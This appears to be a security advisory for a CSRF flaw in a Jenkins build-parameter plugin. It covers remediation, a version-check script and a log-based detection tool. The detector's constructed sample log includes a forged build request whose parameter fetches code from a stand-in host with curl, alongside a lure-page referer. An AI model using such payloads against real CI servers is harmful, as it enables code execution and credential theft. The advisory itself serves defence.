CVE-2021-21629

8.8 HIGH

📋 TL;DR

This cross-site request forgery (CSRF) vulnerability in the Jenkins Build With Parameters Plugin lets an attacker who lures a logged-in Jenkins user to a malicious page start a build of a project with attacker-chosen parameter values, without the user noticing. Any Jenkins instance running plugin version 1.5 or earlier is affected. The impact is whatever the targeted job does with its parameters (shell steps, deploy targets, script paths), up to code execution on build agents.

💻 Affected Systems

Products:
  • Jenkins Build With Parameters Plugin
Versions: 1.5 and earlier
Operating Systems: All platforms running Jenkins
Default Config Vulnerable: ⚠️ Yes
Notes: Requires Jenkins with the vulnerable plugin installed and active. The attacker needs no Jenkins account; the request is issued by the victim's browser, so the victim must be logged in to Jenkins with Job/Build permission on the targeted project when the lure page is visited.

📦 What is this software?

Jenkins is a widely used open-source CI/CD automation server. The Build With Parameters Plugin adds a parambuild page to each parameterized job that pre-fills the build's parameter values from the URL query string, so a shared link can carry the values and the user only has to review the form and confirm the build. The vulnerability is in that form's submission handling: it accepted GET requests, so a crafted link or embedded request could submit the build directly.

⚠️ Risk & Real-World Impact

🔴

Worst Case

If a project's parameters flow into shell steps, deploy targets, branch names or script paths, an attacker-chosen build can execute arbitrary code on Jenkins agents, expose credentials bound to the job, or push attacker-controlled artifacts to production environments.

🟠

Likely Case

Attackers could trigger builds with malicious parameters to exfiltrate sensitive data, disrupt CI/CD pipelines, or inject malicious code into build artifacts.

🟢

If Mitigated

With the plugin updated (form submission requires POST, so Jenkins' crumb check applies) and Job/Build permission limited to the users who need it, a build can only be started by a deliberate, authenticated form submission, and only by someone already allowed to build that project.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No (the attacker needs no account, but the request rides on a victim's authenticated browser session)
Complexity: LOW

Exploitation requires luring a logged-in user with Job/Build permission to an attacker-controlled page (or getting them to follow a crafted link). The plugin's form-submission endpoint accepted GET requests, and Jenkins' CSRF crumb check only covers POST, so the crumb was never required for the request that schedules the build.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.6 or later

Vendor Advisory: https://www.jenkins.io/security/advisory/2021-03-30/#SECURITY-2257

Restart Required: Yes

Instructions:

1. Update the Build With Parameters Plugin to version 1.6 or later via Manage Jenkins > Manage Plugins > Updates.
2. Restart Jenkins to load the new plugin version.
3. Confirm the installed version under Manage Jenkins > Manage Plugins > Installed.

🔧 Temporary Workarounds

Confirm CSRF Protection Is Enabled

Applies to: all platforms

Jenkins' crumb-based CSRF protection is on by default and cannot be disabled since Jenkins 2.222. Confirm it is on, but do not count it as a mitigation for this CVE: the vulnerable endpoint accepted GET requests, which are never crumb-checked. It becomes effective only once plugin 1.6+ forces the submission to be a POST.

Navigate to Manage Jenkins > Configure Global Security > CSRF Protection and confirm 'Prevent Cross Site Request Forgery exploits' is enabled

Restrict Build Permissions

Applies to: all platforms

Limit Job/Build permission to the users who actually need it. A logged-in user without Job/Build on a project cannot be used as a CSRF victim against that project.

Navigate to Manage Jenkins > Configure Global Security > Authorization, use Matrix-based security or Project-based Matrix Authorization Strategy, grant Job/Build only to the required users or groups, and review per-project matrices where they are enabled

🧯 If You Can't Patch

  • Disable or uninstall the Build With Parameters Plugin until it can be updated; the vulnerable endpoint is only served while the plugin is active
  • Implement strict network segmentation and firewall rules so that Jenkins is reachable only from trusted networks, and restrict Job/Build permission to the smallest possible set of users
  • Educate users with Job/Build permission about phishing risks and advise them to log out of Jenkins (or use a separate browser profile) when browsing untrusted sites

🔍 How to Verify

Check if Vulnerable:

Check plugin version in Manage Jenkins > Manage Plugins > Installed tab > Build With Parameters Plugin

Check Version:

# Reading the plugin manager API requires Overall/Administer; authenticate with a user and API token.
# The plugin's ID (shortName) in the API is build-with-parameters.
curl -s -u USER:API_TOKEN 'https://jenkins-host/pluginManager/api/json?depth=1' \
  | python3 -c 'import json,sys; print([(p["shortName"], p["version"], p["active"]) for p in json.load(sys.stdin)["plugins"] if p["shortName"] == "build-with-parameters"])'

Verify Fix Applied:

Verify that the installed plugin version is 1.6 or higher. As a functional check, the pre-fill page at /job/<job>/parambuild/ should still load normally, while a GET request to the plugin's form-submission URL (the URL the parambuild form posts to) should now be refused as requiring POST instead of scheduling a build.
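The version check as a small Python program, added here as an example (it is not part of the original page or of the plugin): it reads the JSON that the pluginManager API call above returns and compares versions numerically, so that a hypothetical 1.10 is not judged older than 1.6 the way a string comparison would. The sample API response is constructed; the field names shortName, version, active and enabled are those used by the real Jenkins plugin manager API.

```python
import json
import re
from typing import Tuple

PLUGIN_SHORT_NAME = "build-with-parameters"   # plugin ID as reported by the Jenkins API
FIXED_VERSION = "1.6"                         # first release with the fix (SECURITY-2257)

# Constructed stand-in for GET /pluginManager/api/json?depth=1 (only the fields used here).
SAMPLE_API_RESPONSE = json.dumps({
    "plugins": [
        {"shortName": "git", "longName": "Git plugin", "version": "4.7.1",
         "active": True, "enabled": True},
        {"shortName": "build-with-parameters", "longName": "Build With Parameters",
         "version": "1.5", "active": True, "enabled": True},
    ]
})


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn the leading dotted-numeric part of a plugin version into a tuple of ints.

    "1.5" -> (1, 5), "1.10" -> (1, 10), "1.6-SNAPSHOT" -> (1, 6).  Comparing these
    tuples is numeric, unlike comparing the strings ("1.10" < "1.6" as strings).
    """
    m = re.match(r"\d+(?:\.\d+)*", version)
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(part) for part in m.group().split("."))


def assess(api_json: str) -> dict:
    """Classify a Jenkins instance from its plugin manager JSON.

    'exposed' is True only when a vulnerable version is installed *and* the plugin is
    active: a disabled plugin serves no endpoints, but must still be updated before
    it is re-enabled.
    """
    plugins = json.loads(api_json).get("plugins", [])
    plugin = next((p for p in plugins if p.get("shortName") == PLUGIN_SHORT_NAME), None)
    if plugin is None:
        return {"installed": False, "version": None,
                "version_vulnerable": False, "exposed": False}
    version = plugin.get("version", "")
    version_vulnerable = parse_version(version) < parse_version(FIXED_VERSION)
    active = bool(plugin.get("active")) and bool(plugin.get("enabled"))
    return {"installed": True, "version": version,
            "version_vulnerable": version_vulnerable,
            "exposed": version_vulnerable and active}


if __name__ == "__main__":
    # Real use: pipe in the output of
    #   curl -s -u USER:API_TOKEN 'https://jenkins-host/pluginManager/api/json?depth=1'
    print(assess(SAMPLE_API_RESPONSE))
```

Run it against the saved API output of each controller you operate; any result with exposed set to True needs the 1.6 update (or the plugin disabled) immediately, and version_vulnerable with exposed False still needs the update before the plugin is turned back on.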

📡 Detection & Monitoring

Log Indicators:

  • Builds of parameterized jobs whose recorded cause is a user who did not intend to start them, or whose parameter values are unusual (external URLs, unexpected deploy targets, shell metacharacters)
  • Jenkins' "No valid crumb was included in the request" warnings do NOT indicate this attack on a vulnerable version: the exploit is a GET, which is never crumb-checked, so their absence is not evidence of safety. After updating to 1.6+, GET attempts against the form-submission URL fail the POST requirement instead

Network Indicators:

  • GET requests (legitimate submissions are POST) to paths below /job/*/parambuild/ that carry parameter values in the query string, especially with a Referer from an origin other than Jenkins or no Referer at all
  • Several such requests against the same job from different authenticated users within a short window, which suggests a lure campaign rather than a single mistaken link

SIEM Query:

# Run against the access log of the reverse proxy in front of Jenkins (Jenkins itself logs no per-request
# access records by default). Field names assume Splunk access_combined extractions; adjust to your SIEM.
index=proxy sourcetype=access_combined method=GET uri_path="/job/*/parambuild/*" status<400 NOT referer="https://jenkins.example.com/*"
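The network indicator above as runnable detection logic, added here as a Python example that is not part of the original page: it parses combined-format reverse-proxy access log lines and flags GET requests to anything below a job's parambuild/ URL, where the plugin's form submission lands and which a legitimate submission only reaches by POST. The log lines are constructed; the handler name configSubmit in them is illustrative (the rule matches any subpath, not that name), and the severity labels HIGH and BLOCKED are my own.

```python
import re
from typing import Dict, List

# Constructed nginx-style combined access log lines for a proxy in front of Jenkins (not real traffic).
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - alice [30/Mar/2021:10:15:02 +0000] "GET /job/deploy-prod/parambuild/configSubmit?TARGET=prod&SCRIPT=curl+http://203.0.113.5/x HTTP/1.1" 302 0 "https://attacker.example/lure.html" "Mozilla/5.0"
203.0.113.7 - bob [30/Mar/2021:10:16:40 +0000] "GET /job/deploy-prod/parambuild/?TARGET=staging HTTP/1.1" 200 5120 "https://wiki.example.com/runbook" "Mozilla/5.0"
203.0.113.7 - bob [30/Mar/2021:10:16:55 +0000] "POST /job/deploy-prod/parambuild/configSubmit HTTP/1.1" 302 0 "https://jenkins.example.com/job/deploy-prod/parambuild/" "Mozilla/5.0"
203.0.113.9 - carol [30/Mar/2021:10:18:11 +0000] "GET /job/deploy-prod/parambuild/configSubmit?TARGET=prod HTTP/1.1" 405 0 "https://attacker.example/lure.html" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Anything *below* /job/<job>/parambuild/ is the form handler, not the pre-fill page.
# The pre-fill page itself (/job/<job>/parambuild/?PARAM=value) is a normal GET and
# is deliberately not matched: the plugin exists to make such links shareable.
# Non-greedy job group keeps folder paths like a/job/b intact.
SUBMIT_RE = re.compile(r'^/job/(?P<job>.+?)/parambuild/(?P<handler>[^/?]+)')


def analyze(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per GET request that reaches the parambuild form handler.

    severity HIGH:    the request was served (status < 400) -> on plugin <= 1.5 a build
                      was scheduled in the victim's name; treat as a likely CSRF hit.
    severity BLOCKED: the server refused it (e.g. the POST requirement of plugin 1.6+);
                      still worth knowing that someone is sending lures.
    """
    findings: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line; skip
        if m["method"] != "GET":
            continue                      # legitimate submissions are POST and crumb-checked
        p = SUBMIT_RE.match(m["path"])
        if not p:
            continue                      # pre-fill page or unrelated URL
        status = int(m["status"])
        findings.append({
            "severity": "HIGH" if status < 400 else "BLOCKED",
            "ts": m["ts"],
            "ip": m["ip"],
            "user": m["user"],            # the victim whose session was used, not the attacker
            "job": p["job"],
            "handler": p["handler"],
            "status": status,
            "referer": m["referer"],      # cross-origin or missing Referer strengthens the case
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_ACCESS_LOG):
        print(f"{f['severity']:7} {f['ts']} user={f['user']} job={f['job']} "
              f"status={f['status']} referer={f['referer']}")
```

The user field in a finding names the account whose session was abused, which is who to contact and whose recent builds to review; the Referer, when present, points at the lure page. Feed the tool the proxy's access log rather than Jenkins' own log, which does not record individual requests by default.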

🔗 References
